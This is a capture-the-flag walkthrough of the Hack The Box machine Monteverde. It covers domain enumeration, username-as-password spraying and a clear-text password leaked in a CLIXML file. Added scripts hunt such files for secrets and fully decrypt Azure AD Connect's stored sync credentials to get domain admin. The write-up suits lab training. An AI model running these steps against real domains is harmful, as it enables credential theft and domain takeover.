
# HTB - Monteverde

## Machine Info

Monteverde is a Medium Windows machine that features Azure AD Connect. The domain is enumerated and a user list is created. Through password spraying, the `SABatchJobs` service account is found to have the username as a password. Using this service account, it is possible to enumerate SMB Shares on the system, and the `$users` share is found to be world-readable. An XML file used for an Azure AD account is found within a user folder and contains a password. Due to password reuse, we can connect to the domain controller as `mhope` using WinRM. Enumeration shows that `Azure AD Connect` is installed. It is possible to extract the credentials for the account that replicates the directory changes to Azure (in this case the default domain administrator).

## Enumeration

***

**Scope**

> IP Address: 10.10.10.172

**Nmap Scan**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack
88/tcp   open  kerberos-sec     syn-ack
135/tcp  open  msrpc            syn-ack
139/tcp  open  netbios-ssn      syn-ack
389/tcp  open  ldap             syn-ack
445/tcp  open  microsoft-ds     syn-ack
464/tcp  open  kpasswd5         syn-ack
636/tcp  open  ldapssl          syn-ack
3269/tcp open  globalcatLDAPssl syn-ack
5985/tcp open  wsman            syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap        

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p 53,88,135,139,389,445,464,636,3269 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-10 14:21:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  tcpwrapped
3269/tcp open  tcpwrapped
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-07-10T14:21:46
|_  start_date: N/A
|_clock-skew: 5s
```

```
* Open ports: 53,88,135,139,389,445,464,636,3269,5985
* UDP Open ports: 53,88,123,389
* Services: DNS - KERBEROS - RPC - SMB - LDAP - NTP - winRM
* Important Notes: Domain: MEGABANK.LOCAL 
```

**DNS Enumeration**

Zone transfer is refused:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ dig axfr MEGABANK.LOCAL @$ip                    

; <<>> DiG 9.19.19-1-Debian <<>> axfr MEGABANK.LOCAL @10.10.10.172
;; global options: +cmd
; Transfer failed.
```

**RPC Enumeration**

`rpcclient` with a null session lists the domain users; I then filtered the output into a user list. Note the `AAD_987d7f2f57d2` account (RID 0x450): that naming pattern is the service account Azure AD Connect creates for its sync service, an early hint that AD Connect is installed on this domain controller.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ cat users.test | cut -d\[ -f2 | cut -d\] -f1  | tee -a users.lst
Guest
AAD_987d7f2f57d2
SABatchJobs
svc-ata
svc-bexec
svc-netapp
mhope
dgalanos
roleary
smorgan
```

**SMB Enumeration**

Anonymous SMB enumeration turned up nothing: the null session authenticates, but share listing is denied.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ crackmapexec smb $ip -u ''  -p '' --shares                                  

SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\: 
SMB         10.10.10.172    445    MONTEVERDE       [-] Error enumerating shares: STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ smbclient -N -L //$ip                            
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

**KERBEROS Enumeration**

I attempted AS-REP roasting, but it failed: every account has Kerberos pre-authentication enabled (no `UF_DONT_REQUIRE_PREAUTH`), and the single `KDC_ERR_CLIENT_REVOKED` belongs to `Guest`, which is disabled.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ impacket-GetNPUsers megabank.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.lst
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set
```

## Initial Access

***

With nothing else to go on, I tried password spraying with each username as its own password. `--no-bruteforce` pairs line *n* of the user list with line *n* of the password list, so every account is tried exactly once, which keeps the attempt well under any lockout threshold.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ crackmapexec smb $ip -u users.lst -p users.lst --no-bruteforce --continue-on-success

<snip>
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
<snip>
```

With `SABatchJobs` I listed the shares and the permissions we have on each one with `crackmapexec`, then walked the readable ones with the `spider_plus` module.

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ crackmapexec smb $ip -u SABatchJobs -p SABatchJobs --shares

SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
SMB         10.10.10.172    445    MONTEVERDE       [+] Enumerated shares
SMB         10.10.10.172    445    MONTEVERDE       Share           Permissions     Remark
SMB         10.10.10.172    445    MONTEVERDE       -----           -----------     ------
SMB         10.10.10.172    445    MONTEVERDE       ADMIN$                          Remote Admin
SMB         10.10.10.172    445    MONTEVERDE       azure_uploads   READ            
SMB         10.10.10.172    445    MONTEVERDE       C$                              Default share
SMB         10.10.10.172    445    MONTEVERDE       E$                              Default share
SMB         10.10.10.172    445    MONTEVERDE       IPC$            READ            Remote IPC
SMB         10.10.10.172    445    MONTEVERDE       NETLOGON        READ            Logon server share 
SMB         10.10.10.172    445    MONTEVERDE       SYSVOL          READ            Logon server share 
SMB         10.10.10.172    445    MONTEVERDE       users$          READ  
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ crackmapexec smb $ip -u SABatchJobs -p SABatchJobs --shares -M spider_plus

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ cat /tmp/cme_spider_plus/10.10.10.172.json

<SNIP>
    "azure_uploads": {},                                   
    "users$": {                                            
        "mhope/azure.xml": {                               
            "atime_epoch": "2020-01-03 08:41:18",                                                                     
            "ctime_epoch": "2020-01-03 08:39:53",                                                                     
            "mtime_epoch": "2020-01-03 09:59:24",                                                                     
            "size": "1.18 KB"
```

Download the interesting file with `smbclient`:

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ smbclient -U SABatchJobs \\\\$ip\\users$       
Password for [WORKGROUP\SABatchJobs]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jan  3 08:12:48 2020
  ..                                  D        0  Fri Jan  3 08:12:48 2020
  dgalanos                            D        0  Fri Jan  3 08:12:30 2020
  mhope                               D        0  Fri Jan  3 08:41:18 2020
  roleary                             D        0  Fri Jan  3 08:10:30 2020
  smorgan                             D        0  Fri Jan  3 08:10:24 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \> cd mhope
smb: \mhope\> ls
  .                                   D        0  Fri Jan  3 08:41:18 2020
  ..                                  D        0  Fri Jan  3 08:41:18 2020
  azure.xml                          AR     1212  Fri Jan  3 08:40:23 2020

                31999 blocks of size 4096. 28979 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (3.4 KiloBytes/sec) (average 3.4 KiloBytes/sec)
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ cat azure.xml  

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>   
```

The file is a CLIXML export (`Export-Clixml`) of an Azure `PSADPasswordCredential` object. Its `Password` property is a plain .NET string rather than a `SecureString`, so it was serialized in clear text: `4n0therD4y@n0th3r$`. Since the file sat in `mhope`'s folder, I sprayed that password across the user list to check for reuse.
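Hunting for this kind of leak more generally, as an added example that is not part of the original write-up: the function below walks a directory for `Export-Clixml` output and reports credential-looking properties, distinguishing clear-text `<S>` strings (the `azure.xml` case) from `<SS>` SecureString blobs. The `<SS>` case is the caveat to remember: those are DPAPI-protected and only decrypt for the user and host that exported them, so the function attempts the decryption and otherwise reports the value as protected. The property-name filter (`pass|secret|key|token`) is my own assumption about what is worth reporting.

```powershell
# Added example (not the write-up's code): triage PowerShell CLIXML exports for credential material.
# Export-Clixml writes String properties in clear text (<S N="...">) and SecureString properties as
# DPAPI-protected blobs (<SS N="...">) that only decrypt for the exporting user on the exporting host.
# Assumption: property names matching 'pass|secret|key|token' are the interesting ones.
function Find-ClixmlSecrets {
    param([Parameter(Mandatory)][string]$Path)

    $ns = @{ ps = 'http://schemas.microsoft.com/powershell/2004/04' }

    foreach ($file in Get-ChildItem -Path $Path -Recurse -File -Filter *.xml) {
        try { [xml]$doc = Get-Content -LiteralPath $file.FullName -Raw -ErrorAction Stop } catch { continue }
        if ($doc.DocumentElement.LocalName -ne 'Objs') { continue }   # not a CLIXML export

        # <S N="..."> : plain .NET strings, serialized in clear text
        foreach ($m in (Select-Xml -Xml $doc -Namespace $ns -XPath '//ps:S[@N]')) {
            if ($m.Node.N -match 'pass|secret|key|token') {
                [pscustomobject]@{ File = $file.FullName; Property = $m.Node.N; Kind = 'PlainText'; Value = $m.Node.InnerText }
            }
        }

        # <SS N="..."> : SecureStrings, DPAPI-protected; decryptable only as the exporting user on the exporting host
        foreach ($m in (Select-Xml -Xml $doc -Namespace $ns -XPath '//ps:SS[@N]')) {
            $value = '<DPAPI-protected: decrypt as the exporting user on the exporting host>'
            try {
                $ss    = ConvertTo-SecureString -String $m.Node.InnerText -ErrorAction Stop
                $value = [System.Net.NetworkCredential]::new('', $ss).Password
            } catch { }
            [pscustomobject]@{ File = $file.FullName; Property = $m.Node.N; Kind = 'SecureString'; Value = $value }
        }
    }
}

# Usage: point it at the loot directory where azure.xml was saved
Find-ClixmlSecrets -Path . | Format-Table -AutoSize
```

On the Monteverde file this reports one `PlainText` hit for the `Password` property; the `KeyId` is a `<G>` (Guid) element, so it is not touched. Run the same function on a Windows host as the user who wrote an export, and any `<SS>` entries from that user come back decrypted.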

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ crackmapexec smb $ip -u users.lst -p '4n0therD4y@n0th3r$' --continue-on-success

<snip>
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ 
<snip>
```

We have a valid credential; let's check whether it gives us remote access over WinRM (port 5985).

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ crackmapexec winrm $ip -u mhope -p '4n0therD4y@n0th3r$' 

WINRM       10.10.10.172    5985   MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)
```

Yes, it does :)

```powershell
*Evil-WinRM* PS C:\Users\mhope> type Desktop\user.txt
91d393fd513501e700cxxxxxxxxxxxxx
```

> User Flag: 91d393fd513501e700cxxxxxxxxxxxxx

***

## Privilege Escalation

Useful Post: [Azure AD Connect for Red Teamers - XPN InfoSec Blog (xpnsec.com)](https://blog.xpnsec.com/azuread-connect-for-redteam/)

* The POC targets AD Connect's LocalDB instance; on this box the `ADSync` database is served by a SQL Server instance listening on the loopback address, so modify the connection string line to use:
  * `Server=127.0.0.1`
  * `Database=ADSync`
  * `Integrated Security=True`

```powershell
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]
└─$ nano azure_decrypt_password.ps1

Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"

$client = New-Object System.Data.SqlClient.SqlConnection -ArgumentList "Server=127.0.0.1;DataBase=ADSync;Integrated Security=True"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
<snip>
```

```

*Evil-WinRM* PS C:\Users\mhope\Documents> .\azure_decrypt_password.ps1
AD Connect Sync Credential Extract POC (@_xpn_)

Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dmxxxxxxxxxx
```
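As an added, fully worked version of the step above (reconstructed from the approach in the linked xpn post; it is not the write-up's own snipped script): the sequence reads the key-set identifiers and entropy from `mms_server_configuration`, reads the AD connector's clear-text configuration XML and its encrypted configuration blob from `mms_management_agent`, hands the key material to the `KeyManager` class shipped in AD Connect's own `mcrypt.dll` to decrypt the blob, and prints the connector account. The account is normally an `MSOL_<id>` user holding directory-replication rights, which is why this is a path to DCSync; on this box it is the domain Administrator. The connection string is the Monteverde one; the DLL path and the `KeyManager` class and method names are taken from the xpn post and are assumed to match the installed AD Connect version. The query only works as a login that can read the `ADSync` database.

```powershell
# Added example, not the write-up's script: AD Connect sync-account credential extraction,
# after @_xpn_'s POC. Assumptions: the ADSync database is reachable on the loopback SQL
# instance with integrated auth (as on Monteverde) and AD Connect is installed under
# C:\Program Files\Microsoft Azure AD Sync.

$conn = New-Object System.Data.SqlClient.SqlConnection -ArgumentList 'Server=127.0.0.1;Database=ADSync;Integrated Security=True'
$conn.Open()

# 1. Key-set id, instance id and entropy: the inputs the key manager needs to rebuild the key set.
$cmd = $conn.CreateCommand()
$cmd.CommandText = 'SELECT keyset_id, instance_id, entropy FROM mms_server_configuration'
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$keysetId   = $reader.GetInt32(0)
$instanceId = $reader.GetGuid(1)
$entropy    = $reader.GetGuid(2)
$reader.Close()

# 2. The AD connector: clear-text XML (domain, user name) plus the encrypted blob (password).
$cmd = $conn.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$configXml = $reader.GetString(0)
$encrypted = $reader.GetString(1)
$reader.Close()
$conn.Close()

# 3. Let AD Connect's own key manager load the key set and decrypt the blob.
Add-Type -Path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instanceId, $keysetId)
$activeKey = $null
$km.GetActiveCredentialKey([ref]$activeKey)
$key = $null
$km.GetKey(1, [ref]$key)
$decrypted = $null
$key.DecryptBase64ToString($encrypted, [ref]$decrypted)

# 4. Pull the fields out of the two XML documents.
$domain   = (Select-Xml -Content $configXml -XPath "//parameter[@name='forest-login-domain']").Node.InnerXml
$username = (Select-Xml -Content $configXml -XPath "//parameter[@name='forest-login-user']").Node.InnerXml
$password = (Select-Xml -Content $decrypted -XPath '//attribute' | Select-Object -First 1).Node.InnerXml

Write-Host "Domain:   $domain"
Write-Host "Username: $username"
Write-Host "Password: $password"
```

Drop the script into the WinRM session's working directory and run it as `mhope`, exactly as the snipped POC is run above; the output has the same three `Domain`/`Username`/`Password` lines.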

```powershell
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Monteverde]                                 
└─$ evil-winrm -i $ip -u 'administrator' -p 'd0m@in4dmxxxxxxxxx'


*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
bb3e0436d4588c2baxxxxxxxxxxxxx
```

> Root Flag: bb3e0436d4588c2baxxxxxxxxxxxxx

